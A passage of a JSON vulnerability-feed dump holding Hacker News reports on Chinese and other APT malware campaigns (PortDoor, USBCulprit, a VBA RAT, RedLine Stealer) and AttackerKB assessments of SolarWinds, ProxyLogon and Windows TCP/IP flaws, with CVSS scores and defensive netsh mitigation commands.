state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces.\n\nThe phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous \"Royal Road\" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed \"**PortDoor**,\" according to Cybereason's Nocturnus threat intelligence team.\n\n\"Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more,\" the researchers [said](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>) in a write-up on Friday.\n\nRubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over [85% of submarines](<https://ckb-rubin.ru/en/company_profile/>) in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines.\n\n[](<https://thehackernews.com/images/-LhySSop9zLA/YI-dzc0pM9I/AAAAAAAACbM/Nhsd5V7X3tY_t7UM4MzbcCyd6fxoRAV1ACLcBGAsYHQ/s0/hacking.jpg>) \n--- \nContent of the weaponized RTF document \n \nOver the years, Royal Road has earned its place as a [tool of choice](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>) among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. 
Known for exploiting multiple flaws in Microsoft's [Equation Editor](<https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018>) (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, the attacks take the form of targeted spear-phishing campaigns that utilize malicious RTF documents to deliver custom malware to unsuspecting high-value targets.\n\nThis newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of \"8.t,\" the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called \"e.o\" to fetch the PortDoor implant, implying a new variant of the weaponizer in use.\n\nSaid to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server.\n\n\"The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\" the researchers said.\n
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-03T07:34:00", "type": "thn", "title": "New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-05-03T16:14:45", "id": "THN:8EAD85C313EF85BE8D38BAAD851B106E", "href": "https://thehackernews.com/2021/05/new-chinese-malware-targeted-russias.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:26", "description": "[](<https://thehackernews.com/images/-XDTHXeRiSOs/XtiwKuAffDI/AAAAAAAAAZ0/agv-iIrKqt8IiznmwrS_g-Hhgu-R--8RgCLcBGAsYHQ/s728-e100/malware.jpg>)\n\nA Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to newly published research 
by Kaspersky yesterday. \n \nThe APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos. \n \n\"One of the newly revealed tools is named **USBCulprit **and has been found to rely on USB media in order to exfiltrate victim data,\" [Kaspersky](<https://securelist.com/cycldek-bridging-the-air-gap/97157/>) said. \"This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\" \n \nFirst observed by [CrowdStrike](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop a malware called NewCore RAT. \n \n\n\n## Exfiltrating Data to Removable Drives\n\n \nKaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure, but also contain features that are exclusive to RedCore \u2014 namely a keylogger and an RDP logger that captures details about users connected to a system via RDP. \n \n\n\n[](<https://thehackernews.com/images/-Uo7TkL_TEQg/XtirFVGHNWI/AAAAAAAAAZk/3fpINW9IErAOfGCG0T7fZGr5K9LM3BnuACLcBGAsYHQ/s728-e100/usb-virus.jpg>)\n\n \n\"Each cluster of activity had a different geographical focus,\" the researchers said. 
\"The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.\" \n \nBoth BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems. \n \nChief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive. \n \n\n\n[](<https://thehackernews.com/images/-T3eT2rv9TYU/XtirEJq7SnI/AAAAAAAAAZg/x2SxjApz6oolC0VavLfhqMYUtS4eQTMcQCLcBGAsYHQ/s728-e100/usb-computer-virus.jpg>)\n\n \nWhat's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine. \n \nA telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of last year. \n \nThe initial infection mechanism relies on leveraging malicious binaries that mimic legitimate antivirus components to load USBCulprit in what's called [DLL search order hijacking](<https://attack.mitre.org/techniques/T1038/>) before it proceeds to collect the relevant information, save it in the form of an encrypted RAR archive, and exfiltrate the data to a connected removable device. \n \n\"The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,\" the researchers said. 
\"This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.\" \n \nUltimately, the similarities and differences between the two pieces of malware are indicative of the fact that the actors behind the clusters are sharing code and infrastructure, while operating as two different offshoots under a single larger entity. \n \n\"Cycldek is an example of an actor that has broader capability than publicly perceived,\" Kaspersky concluded. \"While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-04T08:31:00", "type": "thn", "title": "New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-04T08:31:39", "id": 
"THN:42E3306FC75881CF8EBD30FA8291FF29", "href": "https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-I2pNCdG5Z4Q/YQLGX235y6I/AAAAAAAADYo/5ghaW_-O9UcVkr2h1ElM9OK55A4BtxsUwCLcBGAsYHQ/s0/malware-attack.jpg>)\n\nAn unidentified threat actor has been exploiting a now-patched zero-day flaw in Internet Explorer browser to deliver a fully-featured VBA-based remote access trojan (RAT) capable of accessing files stored in compromised Windows systems, and downloading and executing malicious payloads as part of an \"unusual\" campaign.\n\nThe backdoor is distributed via a decoy document named \"Manifest.docx\" that loads the exploit code for the vulnerability from an embedded template, which, in turn, executes shellcode to deploy the RAT, according to cybersecurity firm Malwarebytes, which spotted the suspicious Word file on July 21, 2021. \n\nThe malware-laced document claims to be a \"Manifesto of the inhabitants of Crimea\" calling on the citizens to oppose Russian President Vladimir Putin and \"create a unified platform called 'People's Resistance.'\"\n\nThe Internet Explorer flaw, tracked as **CVE-2021-26411**, is notable for the fact that it was abused by the North Korea-backed Lazarus Group to [target security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development.\n\nEarlier this February, South Korean cybersecurity firm ENKI [revealed](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) the state-aligned hacking collective had made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer. 
Microsoft [addressed the issue](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) as part of its Patch Tuesday updates for March.\n\n[](<https://thehackernews.com/images/-lZ4BcbcuZ5w/YQLCARxT1bI/AAAAAAAADYg/ng5r_-f-4f0B0RS2Mf-rIkCbF0u_7vKTQCLcBGAsYHQ/s0/malware.jpg>)\n\nThe Internet Explorer exploit is one of the two ways that's used to deploy the RAT, with the other method relying on a social engineering component that involves downloading and executing a remote macro-weaponized template containing the implant. Regardless of the infection chain, the use of double attack vectors is likely an attempt to increase the likelihood of finding a path into the targeted machines.\n\n\"While both techniques rely on template injection to drop a full-featured remote access trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery,\" Malwarebytes researcher Hossein Jazi said in a [report](<https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/>) shared with The Hacker News. 
\"The attackers may have wanted to combine social engineering and exploit to maximize their chances of infecting targets.\"\n\nBesides collecting system metadata, the VBA RAT is orchestrated to identify antivirus products running on the infected host and execute commands it receives from an attacker-controlled server, including reading, deleting, and downloading arbitrary files, and exfiltrate the results of those commands back to the server.\n\nAlso discovered by Malwarebytes is a PHP-based panel nicknamed \"Ekipa\" that's used by the adversary to track victims and view information about the modus operandi that led to the successful breach, highlighting successful exploitation using the IE zero-day and the execution of the RAT.\n\n\"As the [conflict between Russia and Ukraine](<https://en.wikipedia.org/wiki/Russo-Ukrainian_War>) over Crimea continues, cyber attacks have been increasing as well,\" Jazi said. \"The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-29T15:18:00", "type": "thn", "title": "Hackers Exploit Microsoft Browser Bug to Deploy VBA Malware on Targeted PCs", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-07-29T15:18:26", "id": "THN:BE0D8117CAD7D5DE97C405935DA09BC3", "href": "https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoNnACNL4tRXhmeRID1KNB0_0j084PU17zaVDx1SxcV1CFt2BlV43KNXnZkDDAR985mEgiQcsym3EvrPBUSnvxY2MeEYVkQM4xXlSNUzbLB98CzlGZ4a9VsE0crb-4OSGd6167GXHRqsv_Q1nVk-reN0Jwy6FUir34MAXaXtejrxv4Fdin_zG4w0Hy/s728-e100/Malware-botnet.jpg>)\n\nA new campaign leveraging an exploit kit has been observed abusing an 
Internet Explorer flaw patched by Microsoft last year to deliver the RedLine Stealer trojan.\n\n\"When executed, RedLine Stealer performs recon against the target system (including username, hardware, browsers installed, anti-virus software) and then exfiltrates data (including passwords, saved credit cards, crypto wallets, VPN logins) to a remote command and control server,\" Bitdefender [said](<https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/>) in a new report shared with The Hacker News.\n\nMost of the infections are located in Brazil and Germany, followed by the U.S., Egypt, Canada, China, and Poland, among others.\n\nExploit kits or exploit packs are comprehensive tools that contain a collection of exploits designed to take advantage of vulnerabilities in commonly-used software by scanning infected systems for different kinds of flaws and deploying additional malware.\n\nThe primary infection method used by attackers to distribute exploit kits, in this case the [Rig Exploit Kit](<https://blog.talosintelligence.com/2016/11/rig-exploit-kit-campaign-happy-puzzling.html>), is through compromised websites that, when visited, drops the exploit code to ultimately send the RedLine Stealer payload to carry out follow-on attacks.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiTiqBiBM_tUQDifo7wSzoSmySElE7plr5n8i313DuMqdGIvgxgtI8BwkXKvGn9BhTFJbL5wO3nEo5epjh_wK6NXHiY5HX4H-zBXR1biJrlrDoHMp0kOD9TpOFTAquH1yuDwBTqaA8sHb5ykwjftMSl6orvCwshZvLvvUeR9n89rn2ExztZfMlrZ9Zz/s728-e100/malware-redline.jpg>)\n\nThe flaw in question is [CVE-2021-26411](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) (CVSS score: 8.8), a memory corruption vulnerability impacting Internet Explorer that has been [previously](<https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html>) [weaponized](<https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html>) by North 
Korea-linked threat actors. It was addressed by Microsoft as part of its Patch Tuesday updates for March 2021.\n\n\"The RedLine Stealer sample delivered by RIG EK comes packed in multiple encryption layers [...] to avoid detection,\" the Romanian cybersecurity firm noted, with the unpacking of the malware progressing through as many as six stages.\n\nRedLine Stealer, an information-stealing malware sold on underground forums, comes with features to exfiltrate passwords, cookies and credit card data saved in browsers, as well as crypto wallets, chat logs, VPN login credentials and text from files as per commands received from a remote server.\n\nThis is far from the only campaign that involves the distribution of RedLine Stealer. In February 2022, HP [detailed](<https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/>) a social engineering attack using fake Windows 11 upgrade installers to trick Windows 10 users into downloading and executing the malware.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-28T08:20:00", "type": "thn", "title": "New RIG Exploit Kit Campaign Infecting Victims' PCs with RedLine Stealer", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2022-04-28T08:20:39", "id": "THN:4225CEE6D7775276254C20B6E19126AE", "href": "https://thehackernews.com/2022/04/new-rig-exploit-kit-campaign-infecting.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-10-04T22:44:09", "description": "The Collector Service in SolarWinds Orion Platform before 2020.2.4 uses MSMQ (Microsoft Message Queue) and doesn\u2019t set permissions on its private queues. As a result, remote unauthenticated clients can send messages to TCP port 1801 that the Collector Service will process. 
Additionally, upon processing of such messages, the service deserializes them in insecure manner, allowing remote arbitrary code execution as LocalSystem.\n\n \n**Recent assessments:** \n \n**wvu-r7** at February 05, 2021 10:45pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/GuXRxDl2UG/cve-2021-25274#rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-03T00:00:00", "type": "attackerkb", "title": "SolarWinds Orion Platform Unauthenticated RCE (CVE-2021-25274)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276"], "modified": "2021-02-09T00:00:00", "id": "AKB:4D8A45D9-93E7-4267-B52C-96AB82DF5A06", "href": "https://attackerkb.com/topics/GuXRxDl2UG/solarwinds-orion-platform-unauthenticated-rce-cve-2021-25274/rapid7-analysis", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-21T17:14:30", "description": "Microsoft disclosed four actively exploited zero-day vulnerabilities 
being used to attack on-premises versions of Microsoft Exchange Server. The vulnerabilities identified are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which affect Microsoft Exchange Server. Exchange Online is not affected.\n\nIn the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 03, 2021 4:10pm UTC reported:\n\nMicrosoft [released details](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on an active state-sponsored threat campaign (attributed to HAFNIUM) that is exploiting on-prem Exchange Server installations. Microsoft\u2019s observation was that these were limited, targeted attacks, but as of March 3, 2021, ongoing mass exploitation has been confirmed by multiple sources. More in the [Rapid7 analysis](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=assessment#rapid7-analysis>) tab.\n\n**NinjaOperator** at June 29, 2021 9:51pm UTC reported:\n\nMicrosoft [released details](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on an active state-sponsored threat campaign (attributed to HAFNIUM) that is exploiting on-prem Exchange Server installations. Microsoft\u2019s observation was that these were limited, targeted attacks, but as of March 3, 2021, ongoing mass exploitation has been confirmed by multiple sources. 
More in the [Rapid7 analysis](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=assessment#rapid7-analysis>) tab.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T00:00:00", "type": "attackerkb", "title": "Multiple Microsoft Exchange zero-day vulnerabilities - ProxyLogon Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-09T00:00:00", "id": "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "href": "https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---proxylogon-exploit-chain", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:10:51", "description": "Windows TCP/IP Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-24074.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at February 09, 2021 9:42pm UTC reported:\n\nThis remains a 
spectacularly new vulnerability with little documentation associated with it beyond Microsoft\u2019s blog here: <https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/> \nIn the blog, this is a remote code execution vulnerability reported as associated with IPv6 packet reassembly. According to the vulnerability report here: <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>, there is a patch, and you can create a firewall rule on Windows host-based firewalls to block an attack with the command `Netsh int ipv6 set global reassemblylimit=0` to block packet reassembly. THIS MAY AFFECT SOME NETWORK TRAFFIC. \nA second denial of service vulnerability (CVE-2021-24086) also associated with IPv6 fragment reassembly is mitigated with the same command. \nAs pure speculation, this vulnerability might be associated with memory corruption through improper length reporting, such that when packets are reassembled in memory, they are placed in a buffer of insufficient size to store them. 
Should that be the case, this would most likely be a heap vulnerability, and like other heap vulnerabilities before it like eternalblue, bluekeep, and dejablue, it will be a real pain to get to work on a regular basis or as a worm-able exploit.\n\nAssessed Attacker Value: 1 \nAssessed Attacker Value: 1Assessed Attacker Value: 1\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "attackerkb", "title": "CVE-2021-24094", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24094"], "modified": "2021-03-03T00:00:00", "id": "AKB:5ACC27EC-B7F2-405F-B3D6-009D27A1C386", "href": "https://attackerkb.com/topics/MKqjeN2Z1F/cve-2021-24094", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:09:57", "description": "Windows TCP/IP Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-24094.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at February 09, 2021 9:16pm UTC reported:\n\nThis remains a spectacularly new vulnerability with little documentation associated with it 
beyond Microsoft\u2019s blog here: <https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/> \nIn the blog, they report that this vulnerability is associated with IPv4 source routing, but the default blocks against source routing on Windows are not sufficient, as the default configuration allows a Windows system to process ICMP requests with source routing. \nReported as a remote code execution vulnerability, Microsoft claims that it will likely not be weaponized for that purpose quickly, though it might see a DoS exploit in the near-term. \nThere is a patch, but also, the mitigations provided in the guidance (<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24074>) involve the creation of a rule blocking source forwarding from the built-in firewall: \n`netsh int ipv4 set global sourceroutingbehavior=drop` \nSuch a change in the firewall configuration can be deployed by group policy and would not require a reboot. The rule could also be deployed to infrastructure firewalls, but would then only protect against attacks that took place across the firewall; the rules would need to be set on all Windows system host-based firewalls to protect against lateral movement within a network.\n\n**gwillcox-r7** at April 23, 2021 8:24pm UTC reported:\n\nThis remains a spectacularly new vulnerability with little documentation associated with it beyond Microsoft\u2019s blog here: <https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/> \nIn the blog, they report that this vulnerability is associated with IPv4 source routing, but the default blocks against source routing on Windows are not sufficient, as the default configuration allows a Windows system to process ICMP requests with source routing. \nReported as a remote code execution vulnerability, Microsoft claims that it will likely not be weaponized for that purpose quickly, though it might see a DoS exploit in the near-term. 
